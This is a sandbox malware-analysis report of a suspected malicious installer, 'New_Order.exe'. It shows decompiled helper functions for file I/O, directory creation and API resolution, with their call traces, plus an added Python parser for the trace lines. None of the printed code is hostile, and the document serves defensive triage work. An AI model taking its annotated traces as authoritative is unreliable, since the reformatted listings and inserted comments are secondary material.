                                                                        0x00401617
                                                                        0x00401617
                                                                        0x0040160c
                                                                        0x0040160d
                                                                        0x00401615
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401615
                                                                        0x0040160a
                                                                        0x0040161a
                                                                        0x0040161d
                                                                        0x0040161f
                                                                        0x00401620
                                                                        0x004015d0
                                                                        0x00401627
                                                                        0x00401652
                                                                        0x004022dd
                                                                        0x00401629
                                                                        0x0040162b
                                                                        0x00401636
                                                                        0x0040163c
                                                                        0x00401644
                                                                        0x0040164a
                                                                        0x0040164a
                                                                        0x00401644
                                                                        0x00402a5d
                                                                        0x00402a69

                                                                        APIs
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                          • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 1892508949-1943935188
                                                                        • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                        • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                        • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                        • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E00401389(signed int _a4) {
                                                                        				intOrPtr* _t6;
                                                                        				void* _t8;
                                                                        				void* _t10;
                                                                        				signed int _t11;
                                                                        				void* _t12;
                                                                        				signed int _t16;
                                                                        				signed int _t17;
                                                                        				void* _t18;
                                                                        
                                                                        				_t17 = _a4;
                                                                        				while(_t17 >= 0) {
                                                                        					_t6 = _t17 * 0x1c +  *0x42f470;
                                                                        					if( *_t6 == 1) {
                                                                        						break;
                                                                        					}
                                                                        					_push(_t6); // executed
                                                                        					_t8 = E00401434(); // executed
                                                                        					if(_t8 == 0x7fffffff) {
                                                                        						return 0x7fffffff;
                                                                        					}
                                                                        					_t10 = E0040136D(_t8);
                                                                        					if(_t10 != 0) {
                                                                        						_t11 = _t10 - 1;
                                                                        						_t16 = _t17;
                                                                        						_t17 = _t11;
                                                                        						_t12 = _t11 - _t16;
                                                                        					} else {
                                                                        						_t12 = _t10 + 1;
                                                                        						_t17 = _t17 + 1;
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                        						 *0x42ec0c =  *0x42ec0c + _t12;
                                                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}
                                                                        0x0040138a
                                                                        0x004013fa
                                                                        0x0040139b
                                                                        0x004013a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004013a2
                                                                        0x004013a3
                                                                        0x004013ad
                                                                        0x00000000
                                                                        0x00401404
                                                                        0x004013b0
                                                                        0x004013b7
                                                                        0x004013bd
                                                                        0x004013be
                                                                        0x004013c0
                                                                        0x004013c2
                                                                        0x004013b9
                                                                        0x004013b9
                                                                        0x004013ba
                                                                        0x004013ba
                                                                        0x004013c9
                                                                        0x004013cb
                                                                        0x004013f4
                                                                        0x004013f4
                                                                        0x004013c9
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageA.USER32 ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                        • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                        • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                        • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406500(signed int _a4) {
                                                                        				struct HINSTANCE__* _t5;
                                                                        				signed int _t10;
                                                                        
                                                                        				_t10 = _a4 << 3;
                                                                        				_t8 =  *(_t10 + 0x40a240);
                                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                                        				if(_t5 != 0) {
                                                                        					L2:
                                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                                        				}
                                                                        				_t5 = E00406492(_t8); // executed
                                                                        				if(_t5 == 0) {
                                                                        					return 0;
                                                                        				}
                                                                        				goto L2;
                                                                        			}
                                                                        0x00406508
                                                                        0x0040650b
                                                                        0x00406512
                                                                        0x0040651a
                                                                        0x00406526
                                                                        0x00000000
                                                                        0x0040652d
                                                                        0x0040651d
                                                                        0x00406524
                                                                        0x00000000
                                                                        0x00406535
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                                          • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                          • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                        • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                        • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00405C90(CHAR* _a4, long _a8, long _a12) {
                                                                        				signed int _t5;
                                                                        				void* _t6;
                                                                        
                                                                        				_t5 = GetFileAttributesA(_a4); // executed
                                                                        				asm("sbb ecx, ecx");
                                                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                        				return _t6;
                                                                        			}
                                                                        0x00405c94
                                                                        0x00405ca1
                                                                        0x00405cb6
                                                                        0x00405cbc

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405C6B(CHAR* _a4) {
                                                                        				signed char _t3;
                                                                        				signed char _t7;
                                                                        
                                                                        				_t3 = GetFileAttributesA(_a4); // executed
                                                                        				_t7 = _t3;
                                                                        				if(_t7 != 0xffffffff) {
                                                                        					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                        				}
                                                                        				return _t7;
                                                                        			}
                                                                        0x00405c70
                                                                        0x00405c76
                                                                        0x00405c7b
                                                                        0x00405c84
                                                                        0x00405c84
                                                                        0x00405c8d

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Creates the directory named by _a4 with default security attributes.
                                                                        			// Returns 0 on success, otherwise the Win32 error code from GetLastError.
                                                                        			E00405761(CHAR* _a4) {
                                                                        				int _t2;
                                                                        
                                                                        				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                        				if(_t2 == 0) {
                                                                        					return GetLastError();
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Exact-length read: requests _a12 bytes from handle _a4 into _a8 and treats a
                                                                        			// short read (fewer bytes returned than requested) as failure, not partial success.
                                                                        			// Returns 1 only if ReadFile succeeded and the byte count matches.
                                                                        			E00405D08(void* _a4, void* _a8, long _a12) {
                                                                        				int _t7;
                                                                        				long _t11;
                                                                        
                                                                        				_t11 = _a12; // requested length; _a12 is reused as lpNumberOfBytesRead
                                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Exact-length write, the mirror of E00405D08: writes _a12 bytes from _a8 to
                                                                        			// handle _a4 and returns 1 only if WriteFile succeeded and wrote exactly that many.
                                                                        			E00405D37(void* _a4, void* _a8, long _a12) {
                                                                        				int _t7;
                                                                        				long _t11;
                                                                        
                                                                        				_t11 = _a12; // requested length; _a12 is reused as lpNumberOfBytesWritten
                                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Seeks the file handle kept in the global at 0x40a018 to the absolute offset
                                                                        			// _a4 (lpDistanceToMoveHigh = NULL, dwMoveMethod = 0 = FILE_BEGIN).
                                                                        			// Returns the new file position as reported by SetFilePointer.
                                                                        			E00403300(long _a4) {
                                                                        				long _t2;
                                                                        
                                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                        				return _t2;
                                                                        			}

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Scans the string _a4 for the byte _a8, stepping with CharNextA so that
                                                                        			// multi-byte (DBCS) characters are not split. Returns a pointer to the first
                                                                        			// match, or to the terminating NUL when the byte is absent; unlike strchr it
                                                                        			// never returns NULL, so callers cannot distinguish "not found" by a NULL check.
                                                                        			E00405ABA(CHAR* _a4, intOrPtr _a8) {
                                                                        				CHAR* _t3;
                                                                        				char _t4;
                                                                        
                                                                        				_t3 = _a4;
                                                                        				while(1) {
                                                                        					_t4 =  *_t3;
                                                                        					if(_t4 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t4 != _a8) {
                                                                        						_t3 = CharNextA(_t3); // executed
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t3;
                                                                        			}

                                                                        APIs
                                                                        • CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\New_Order.exe" ,00000020,"C:\Users\user\Desktop\New_Order.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID:
                                                                        • API String ID: 3213498283-0
                                                                        • Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                                                                        • Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
                                                                        • Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                                                                        • Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
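The "APIs" lines in the listings above record, for each call observed at run time, the API name, the module that resolved it, the values found on the stack at the call and the return address (ref). The report lists more stack values than the API takes: CreateDirectoryA has two parameters, yet its line shows thirteen values, and the third, 0040333B, lies inside the image (base 00400000 per the Memory Dump Source entries), i.e. it is the caller's return address, not an argument. The following Python parser is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It turns such lines into records, separates the documented parameters (arity from the Win32 reference) from the adjacent stack, and flags in-image pointers. The sample lines are copied from this section; the image end (0x439000, just past the last listed 0x438000 segment) is an assumption.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing into records.

Added example by the editor; not part of the sandbox report or of the
analysed sample. SAMPLE_LINES are copied from the report section and serve
as an offline test corpus. IMAGE_BASE comes from the report's Memory Dump
Source entries (Offset: 00400000); IMAGE_END is an assumption placed just
past the last listed segment (0x438000).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

IMAGE_BASE = 0x00400000
IMAGE_END = 0x00439000  # assumption: end of the mapped image

# Documented parameter counts (Win32 reference) for the APIs in this section.
ARITY = {
    "GetFileAttributesA": 1, "SetFileAttributesA": 2, "CreateDirectoryA": 2,
    "GetLastError": 0, "ReadFile": 5, "WriteFile": 5, "SetFilePointer": 4,
    "CharNextA": 1,
}

# Copied verbatim from the report's APIs sections.
SAMPLE_LINES = [
    "• CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,0040355A,?,00000007,00000009,0000000B), ref: 00405767",
    "• GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775",
    "• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C",
    '• CharNextA.USER32(?,00403455,"C:\\Users\\user\\Desktop\\New_Order.exe" ,00000020,"C:\\Users\\user\\Desktop\\New_Order.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7',
]

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class Arg:
    raw: str
    kind: str  # 'unknown' (?), 'hex', 'image_ptr' (inside the image) or 'string'
    value: Optional[int] = None


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[Arg]
    ref: int  # return address of the call site


def split_args(text: str) -> list[str]:
    """Split on commas, but never inside a double-quoted string."""
    out, cur, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return out


def classify(token: str) -> Arg:
    """'?' is unresolved; 8 hex digits is a dword, in-image or not; else a string."""
    if token == "?":
        return Arg(token, "unknown")
    if HEX_RE.match(token):
        value = int(token, 16)
        kind = "image_ptr" if IMAGE_BASE <= value < IMAGE_END else "hex"
        return Arg(token, kind, value)
    return Arg(token, "string")


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if m is None:
        return None
    args = [classify(t) for t in split_args(m["args"])]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def parse_lines(lines) -> list[ApiCall]:
    return [c for c in (parse_line(ln) for ln in lines) if c is not None]


def declared_params(call: ApiCall) -> list[Arg]:
    """Only the first ARITY values are parameters; the rest is adjacent stack."""
    n = ARITY.get(call.api)
    return call.args if n is None else call.args[:n]


def stack_tail(call: ApiCall) -> list[Arg]:
    return call.args[len(declared_params(call)):]


def strings_by_api(calls) -> dict[str, list[str]]:
    """Unique string-like stack values per API (paths, command lines)."""
    found: dict[str, set[str]] = {}
    for c in calls:
        for a in c.args:
            if a.kind == "string":
                found.setdefault(c.api, set()).add(a.raw.strip('"'))
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    for call in parse_lines(SAMPLE_LINES):
        ptrs = [a.raw for a in stack_tail(call) if a.kind == "image_ptr"]
        print(f"{call.api:18} {call.module:10} ref={call.ref:08X} "
              f"params={[a.raw for a in declared_params(call)]} in-image tail={ptrs}")
```

Running the module prints one row per call with the documented parameters and the in-image values from the stack tail (for ReadFile these are 004032FD and 00403127, both return addresses of its callers), which is the quickest way to tell a real argument from stack noise when triaging many such listings.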

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 96%
                                                                        			// Dialog procedure of the details window. The visible part handles WM_USER+5
